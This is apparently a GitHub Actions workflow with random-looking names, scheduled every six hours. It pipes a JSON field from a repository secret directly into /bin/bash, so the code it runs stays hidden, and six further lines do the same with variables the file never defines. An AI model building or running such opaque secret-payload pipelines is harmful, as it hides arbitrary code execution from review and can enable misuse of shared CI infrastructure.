name: numberfreethrow
on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: numberfreethrow
        env:
          m29: ${{ secrets.m29 }}
        run: |
          echo $m29 | jq -r .tjh2 | /bin/bash
          echo $j9439 | jq -r .q8985 | /bin/bash
          echo $sucwc64 | jq -r .ltp3 | /bin/bash
          echo $lwb1 | jq -r .hvc4 | /bin/bash
          echo $olkmk217 | jq -r .slwzw2 | /bin/bash
          echo $ghkqf71 | jq -r .cpyy5252 | /bin/bash
          echo $btsnz3978 | jq -r .sirx043 | /bin/bash

